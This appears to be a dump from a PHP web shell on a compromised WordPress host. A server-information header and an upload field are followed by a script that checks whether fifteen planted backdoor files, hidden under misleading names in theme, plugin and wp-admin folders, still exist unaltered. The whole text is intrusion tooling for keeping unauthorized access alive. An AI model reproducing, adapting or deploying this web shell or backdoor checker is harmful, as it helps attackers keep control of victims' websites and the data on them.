|
Server : LiteSpeed System : Linux host 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : idnco5810 ( 1093) PHP Version : 8.2.29 Disable Function : NONE Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/idn98.co/public_html'; $x = ["/wp-admin/user/index.php"=>"bd@@30536@@1149",
"/wp-content/themes/merah/inc/builder/type/header/primary-header/class.astra.primary.header.loader.php"=>"bd@@11606@@1075",
"/wp-content/plugins/amp/vendor/fasterimage/fasterimage/src/FasterImage/Exception/stats.php"=>"bd@@3160@@974",
"/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php"=>"bd@@30555@@5927",
"/wp-content/themes/merah/inc/compatibility/index.php"=>"bd@@29553@@974",
"/wp-content/themes/merah/inc/builder/type/footer/widget/dynamic-css/UnderThesisProj.php"=>"bd@@11382@@896",
"/wp-admin/drYCm6Fs9Nu.php"=>"bd@@648@@45022",
"/wp-content/themes/merah/inc/builder/type/header/menu/dynamic-css/php_http_proxy.php"=>"bd@@2961@@993",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/Section/creacompte.php"=>"bd@@11166@@966",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/Tag/vlweather.php"=>"bd@@1965@@1053",
"/wp-content/themes/merah/inc/builder/type/base/dynamic-css/html/class.astra.html.component.dynamic.css.php"=>"bd@@2477@@868",
"/wp-content/themes/merah/inc/builder/type/footer/above-footer/dynamic-css/article.php"=>"bd@@2757@@1027",
"/wp-content/themes/merah/inc/builder/type/footer/html/dynamic-css/jpgraph_date.php"=>"bd@@11488@@988",
"/wp-content/themes/merah/inc/builder/type/footer/primary-footer/dynamic-css/imagecategory.php"=>"bd@@11259@@948",
"/wp-admin/includes/network.php"=>"bd@@22023@@27808"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');